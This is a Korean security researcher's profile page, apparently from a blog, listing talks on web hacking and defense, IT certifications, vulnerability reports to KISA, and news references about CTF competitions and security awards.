- 미래와소프트웨어재단 - 꿈 찾기 캠프 화이트해커 멘토링 (2019.08)
- 대학정보보호동아리연합회(KUCIS) - 1과 0의 세계를 여행하는 해커들을 위한 이정표 (2017.11)
- 블랙덕 오픈소스 컨퍼런스(BDOSCON) - 오픈소스와 4차산업혁명, 그리고 위협: Apache Struts2 취약점 시연 (2017.06)
- 이화여자대학교 정보보안동아리 E-COPS - 웹 해킹과 방어 (2017.03 ~ 2017.05)
- 서울과학기술대학교 정보보안동아리 CSS - 웹 해킹과 방어 (2016.11)

자격증

- 정보처리기사, 한국산업인력공단 (2018.05)
- 정보처리산업기사, 한국산업인력공단 (2014.11)
- 리눅스마스터 1급, 한국정보통신진흥협회 (2013.11)
- 정보처리기능사, 한국산업인력공단 (2012.07)
- 인터넷정보관리사 2급, 한국정보통신진흥협회 (2007.02)
- 컴퓨터활용능력 2급, 대한상공회의소 (2004.04)
- 워드프로세서 2급, 대한상공회의소 (2003.06)

기타

- KISA S/W 신규 취약점 신고포상제, 총 27 건의 취약점 제보 이력

References

- "해킹 올림픽 ‘데프콘 CTF 29’ 예선 결과는? PPP 1위, 한미 연합팀 StarBugs 7위", 보안뉴스, 2021.05.05
- "데프콘 CTF 2020, 중국 ‘A*0*E’팀 우승…한국 3개팀도 선전", 데일리시큐, 2020.08.10
- "세계 최고 권위 해킹대회 데프콘 CTF 28 본선 16팀 공개... ‘한국 3팀’ 포함", 보안뉴스, 2020.07.27
- "라온화이트햇, 과기부 주최 IoT 보안위협 시나리오 공모전 대상", 위키리크스한국, 2019.12.23
- "라온화이트햇, '2019 energy X Security 해커톤' SW 개발 대상 수상", 전자신문, 2019.10.30
- "KISA, 과기정통부·한전과 전력산업 보안 아이디어 발굴", 전자신문, 2019.10.28
- "[미소재단 SW캠프]게임·AI·반도체 등 9개 분야 진로 멘토링 '성황'", 전자신문, 2019.08.13
- "경기도가 주최하고 경과원이 주관한 정보보안 해커톤 대회 27일 성료", 경기시사투데이, 2019.07.28
- "KISA, 개인정보 비식별 기술 경진대회 본선 결과 발표", 한국인터넷진흥원, 2018.12.03
- "목포대 정보보호 동아리, 육군 해킹방어대회 최우수상 수상", 대학저널, 2018.04.05
- "미래 보안 책임질 차세대 보안리더 5기 인증식 열려", 보안뉴스, 2017.03.30
- "공군 CERT병사 사이버 보안 취약점 5건 발견", 국방일보, 2015.12.29

 

 

'Profile' 카테고리의 다른 글

Profile  (0) 2018.04.03

+ Recent posts